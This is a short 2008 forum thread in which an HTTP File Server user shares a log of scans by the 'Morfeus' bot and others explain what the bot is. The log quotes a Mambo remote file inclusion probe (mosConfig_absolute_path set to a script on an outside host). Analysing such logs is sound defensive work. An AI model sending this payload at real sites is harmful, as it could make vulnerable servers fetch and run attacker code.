rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: Pit on November 17, 2008, 05:42:21 PM

Title: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 05:42:21 PM
Much time of today my webserver was scannt from "Morfeus Fucking Scanner"
This is a part of the log:

17.11.2008 16:54:10 194.165.49.36:50035 Connected
17.11.2008 16:54:10 194.165.49.36:50035 Disconnected
17.11.2008 16:56:10 194.165.49.36:46236 Connected
17.11.2008 16:56:10 194.165.49.36:46236 Requested GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/
17.11.2008 16:56:10 194.165.49.36:46236 Request dump
> GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/ HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Morfeus Fucking Scanner
> Host: 91.37.233.251
> Connection: Close
17.11.2008 16:56:10 194.165.49.36:46236 Served 3,61 KB
17.11.2008 16:56:10 194.165.49.36:46236 Disconnected by server - 3693 bytes sent
17.11.2008 16:56:10 194.165.49.36:46363 Connected
17.11.2008 16:56:10 194.165.49.36:46363 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:10 194.165.49.36:46439 Connected
17.11.2008 16:56:10 194.165.49.36:46439 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:11 194.165.49.36:46512 Connected
17.11.2008 16:56:11 194.165.49.36:46512 Disconnected by server - 1823 bytes sent
17.11.2008 16:56:11 194.165.49.36:46590 Connected
17.11.2008 16:56:11 194.165.49.36:46590 Disconnected by server - 1823 bytes sent


Did anyone know anything about "Morfeus Fucking Scanner" and is it a risk for HFS?
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:05:17 PM
never heard, and it's not a risk IMO.
with event scripts you can even ban it, just to get a cleaner log.
but if it comes from a single IP you can just ban the ip, easier.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 06:07:03 PM
That was the first thing wat i have done. I think it is DDos-Attack.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:09:15 PM
or maybe it is just searching for buggy IIS
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: SilentPliz on November 17, 2008, 06:09:47 PM
Morfeus is a scanner that looks for vulnerabilities in PHP based web sites (bot).

I don't think it could be a danger to HFS.

Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: rejetto on November 17, 2008, 06:15:48 PM
a quick search on google will reveal that mosConfig_absolute_path is an attack to mambo (cms) installations
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: Pit on November 17, 2008, 06:20:17 PM
Thanks for your replys and have a nice evening.
Title: Re: Did anyone know anything about "Morfeus Fucking Scanner"
Post by: SilentPliz on November 17, 2008, 06:24:42 PM
Thanks for your replys and have a nice evening.

Thank you, to you too. :)